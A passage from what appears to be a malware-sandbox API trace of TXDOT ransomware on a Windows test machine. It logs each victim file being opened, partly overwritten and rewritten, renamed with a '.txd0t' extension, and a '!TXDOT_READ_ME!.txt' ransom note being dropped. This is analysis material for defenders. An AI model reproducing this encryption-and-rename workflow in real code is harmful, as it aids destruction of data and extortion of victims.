lpNumberOfBytesWritten=0x53ef784*=0x3830, lpOverlapped=0x0) returned 1 [0076.324] FlushFileBuffers (hFile=0x46c) returned 1 [0076.332] GetProcessHeap () returned 0xe30000 [0076.332] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x100) returned 0xecf180 [0076.332] StrCpyW (in: psz1=0xecf180, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\SjHlBfZqKWu.bmp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\SjHlBfZqKWu.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\SjHlBfZqKWu.bmp" [0076.332] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\SjHlBfZqKWu.bmp") returned="SjHlBfZqKWu.bmp" [0076.332] StrCpyW (in: psz1=0xecf1ba, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.332] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\!TXDOT_READ_ME!.txt") returned 1 [0076.333] GetProcessHeap () returned 0xe30000 [0076.333] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecf180 | out: hHeap=0xe30000) returned 1 [0076.333] CloseHandle (hObject=0x46c) returned 1 [0076.334] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\SjHlBfZqKWu.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\sjhlbfzqkwu.bmp"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\SjHlBfZqKWu.bmp.txd0t" (normalized: "c:\\users\\fd1hvy\\pictures\\sjhlbfzqkwu.bmp.txd0t")) returned 1 [0076.334] SetEvent (hEvent=0x414) returned 1 [0076.334] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0076.339] StrCpyW (in: psz1=0x53ef7c0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\wI6_mSLtm0QHgo.gif" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\wI6_mSLtm0QHgo.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\wI6_mSLtm0QHgo.gif" [0076.339] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\wI6_mSLtm0QHgo.gif", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\wI6_mSLtm0QHgo.gif.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\wI6_mSLtm0QHgo.gif.txd0t" [0076.339] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\wI6_mSLtm0QHgo.gif.txd0t") returned 0 [0076.339] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\wI6_mSLtm0QHgo.gif", dwFileAttributes=0x80) returned 1 [0076.339] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\wI6_mSLtm0QHgo.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\wi6_msltm0qhgo.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0076.339] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=98885) returned 1 [0076.339] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.339] WriteFile (in: hFile=0x460, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0076.340] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffe7bbb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.340] ReadFile (in: hFile=0x460, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x18240, lpNumberOfBytesRead=0x53ef780, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef780*=0x18240, lpOverlapped=0x0) returned 1 [0076.342] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffe7dc0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.342] WriteFile (in: hFile=0x460, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x18240, lpNumberOfBytesWritten=0x53ef784, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef784*=0x18240, lpOverlapped=0x0) returned 1 [0076.342] FlushFileBuffers (hFile=0x460) returned 1 [0076.349] GetProcessHeap () returned 0xe30000 [0076.349] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x106) returned 0xe9d750 [0076.349] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\wI6_mSLtm0QHgo.gif" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\wI6_mSLtm0QHgo.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\wI6_mSLtm0QHgo.gif" [0076.349] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\wI6_mSLtm0QHgo.gif") returned="wI6_mSLtm0QHgo.gif" [0076.349] StrCpyW (in: psz1=0xe9d78a, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.349] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\!TXDOT_READ_ME!.txt") returned 1 [0076.349] GetProcessHeap () returned 0xe30000 [0076.349] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0076.349] CloseHandle (hObject=0x460) returned 1 [0076.352] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\wI6_mSLtm0QHgo.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\wi6_msltm0qhgo.gif"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\wI6_mSLtm0QHgo.gif.txd0t" (normalized: "c:\\users\\fd1hvy\\pictures\\wi6_msltm0qhgo.gif.txd0t")) returned 1 [0076.353] SetEvent (hEvent=0x414) returned 1 [0076.353] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0076.362] StrCpyW (in: psz1=0x53ef7b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\Xej8a4-yl4uAkyUIiU1.jpg" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\Xej8a4-yl4uAkyUIiU1.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\Xej8a4-yl4uAkyUIiU1.jpg" [0076.362] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\Xej8a4-yl4uAkyUIiU1.jpg", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\Xej8a4-yl4uAkyUIiU1.jpg.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\Xej8a4-yl4uAkyUIiU1.jpg.txd0t" [0076.362] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\Xej8a4-yl4uAkyUIiU1.jpg.txd0t") returned 0 [0076.362] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\Xej8a4-yl4uAkyUIiU1.jpg", dwFileAttributes=0x80) returned 1 [0076.362] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\Xej8a4-yl4uAkyUIiU1.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\xej8a4-yl4uakyuiiu1.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0076.362] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=27439) returned 1 [0076.362] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.362] WriteFile (in: hFile=0x46c, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0076.362] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffff92d1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.363] ReadFile (in: hFile=0x46c, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x6b20, lpNumberOfBytesRead=0x53ef770, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef770*=0x6b20, lpOverlapped=0x0) returned 1 [0076.363] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffff94e0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.363] WriteFile (in: hFile=0x46c, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x6b20, lpNumberOfBytesWritten=0x53ef774, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef774*=0x6b20, lpOverlapped=0x0) returned 1 [0076.363] FlushFileBuffers (hFile=0x46c) returned 1 [0076.367] GetProcessHeap () returned 0xe30000 [0076.367] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x110) returned 0xed2328 [0076.367] StrCpyW (in: psz1=0xed2328, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\Xej8a4-yl4uAkyUIiU1.jpg" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\Xej8a4-yl4uAkyUIiU1.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\Xej8a4-yl4uAkyUIiU1.jpg" [0076.367] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\Xej8a4-yl4uAkyUIiU1.jpg") returned="Xej8a4-yl4uAkyUIiU1.jpg" [0076.367] StrCpyW (in: psz1=0xed2362, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.367] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\!TXDOT_READ_ME!.txt") returned 1 [0076.367] GetProcessHeap () returned 0xe30000 [0076.367] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2328 | out: hHeap=0xe30000) returned 1 [0076.367] CloseHandle (hObject=0x46c) returned 1 [0076.368] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\Xej8a4-yl4uAkyUIiU1.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\xej8a4-yl4uakyuiiu1.jpg"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\Xej8a4-yl4uAkyUIiU1.jpg.txd0t" (normalized: "c:\\users\\fd1hvy\\pictures\\xej8a4-yl4uakyuiiu1.jpg.txd0t")) returned 1 [0076.369] SetEvent (hEvent=0x414) returned 1 [0076.369] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0077.462] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0078.624] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0080.037] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0081.096] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0082.183] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0083.269] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x102 [0084.288] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0085.280] StrCpyW (in: psz1=0x53ef7c0, psz2="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" [0085.280] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml.txd0t" [0085.280] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml.txd0t") returned 0 [0085.280] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml", dwFileAttributes=0x80) returned 1 [0085.281] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0085.281] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=74214) returned 1 [0085.281] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.281] WriteFile (in: hFile=0x47c, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0085.283] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffedc1a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.283] ReadFile (in: hFile=0x47c, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x121e0, lpNumberOfBytesRead=0x53ef780, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef780*=0x121e0, lpOverlapped=0x0) returned 1 [0085.290] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffede20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.290] WriteFile (in: hFile=0x47c, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x121e0, lpNumberOfBytesWritten=0x53ef784, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef784*=0x121e0, lpOverlapped=0x0) returned 1 [0085.290] FlushFileBuffers (hFile=0x47c) returned 1 [0085.445] GetProcessHeap () returned 0xe30000 [0085.445] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe9d750 [0085.445] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" [0085.445] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned="LocalizedData.xml" [0085.445] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0085.445] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1025\\!TXDOT_READ_ME!.txt") returned 1 [0085.445] GetProcessHeap () returned 0xe30000 [0085.445] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0085.445] CloseHandle (hObject=0x47c) returned 1 [0085.445] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml.txd0t" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml.txd0t")) returned 1 [0085.445] SetEvent (hEvent=0x414) returned 1 [0085.445] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0085.448] StrCpyW (in: psz1=0x53ef7d0, psz2="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf" [0085.448] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf.txd0t" [0085.448] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf.txd0t") returned 0 [0085.449] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf", dwFileAttributes=0x80) returned 1 [0085.449] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0085.449] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=3314) returned 1 [0085.449] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.449] WriteFile (in: hFile=0x468, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0085.451] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffff10e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.451] ReadFile (in: hFile=0x468, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0xcf0, lpNumberOfBytesRead=0x53ef790, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef790*=0xcf0, lpOverlapped=0x0) returned 1 [0085.451] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffff310, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.451] WriteFile (in: hFile=0x468, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0xcf0, lpNumberOfBytesWritten=0x53ef794, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef794*=0xcf0, lpOverlapped=0x0) returned 1 [0085.451] FlushFileBuffers (hFile=0x468) returned 1 [0085.467] GetProcessHeap () returned 0xe30000 [0085.467] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf6) returned 0xe9d750 [0085.467] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf" [0085.467] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf") returned="eula.rtf" [0085.467] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0085.467] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1030\\!TXDOT_READ_ME!.txt") returned 0 [0085.468] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\!TXDOT_READ_ME!.txt" (normalized: "c:\\588bce7c90097ed212\\1030\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464 [0085.470] WriteFile (in: hFile=0x464, lpBuffer=0x53ef7c4*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x53ef7c0, lpOverlapped=0x0 | out: lpBuffer=0x53ef7c4*, lpNumberOfBytesWritten=0x53ef7c0*=0x2, lpOverlapped=0x0) returned 1 [0085.471] FlushFileBuffers (hFile=0x464) returned 1 [0085.473] WriteFile (in: hFile=0x464, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x53ef7c0, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x53ef7c0*=0x7f0, lpOverlapped=0x0) returned 1 [0085.474] FlushFileBuffers (hFile=0x464) returned 1 [0085.475] CloseHandle (hObject=0x464) returned 1 [0085.475] GetProcessHeap () returned 0xe30000 [0085.475] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0085.475] CloseHandle (hObject=0x468) returned 1 [0085.475] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf.txd0t" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf.txd0t")) returned 1 [0085.476] SetEvent (hEvent=0x414) returned 1 [0085.476] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0085.479] StrCpyW (in: psz1=0x53ef7c0, psz2="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" [0085.479] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml.txd0t" [0085.479] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml.txd0t") returned 0 [0085.479] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml", dwFileAttributes=0x80) returned 1 [0085.479] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0085.479] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=77748) returned 1 [0085.479] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.479] WriteFile (in: hFile=0x460, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0085.481] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffece4c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.481] ReadFile (in: hFile=0x460, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x12fb0, lpNumberOfBytesRead=0x53ef780, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef780*=0x12fb0, lpOverlapped=0x0) returned 1 [0085.483] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffed050, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.483] WriteFile (in: hFile=0x460, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x12fb0, lpNumberOfBytesWritten=0x53ef784, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef784*=0x12fb0, lpOverlapped=0x0) returned 1 [0085.484] FlushFileBuffers (hFile=0x460) returned 1 [0085.648] GetProcessHeap () returned 0xe30000 [0085.648] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe9d750 [0085.648] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" [0085.648] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned="LocalizedData.xml" [0085.648] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0085.648] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1030\\!TXDOT_READ_ME!.txt") returned 1 [0085.648] GetProcessHeap () returned 0xe30000 [0085.648] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0085.648] CloseHandle (hObject=0x460) returned 1 [0085.649] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml.txd0t" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml.txd0t")) returned 1 [0085.649] SetEvent (hEvent=0x414) returned 1 [0085.649] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0085.651] StrCpyW (in: psz1=0x53ef7d0, psz2="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf" [0085.651] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf.txd0t" [0085.651] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf.txd0t") returned 0 [0085.651] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf", dwFileAttributes=0x80) returned 1 [0085.651] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0085.651] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=3702) returned 1 [0085.651] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.651] WriteFile (in: hFile=0x460, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0085.653] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffef8a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.653] ReadFile (in: hFile=0x460, 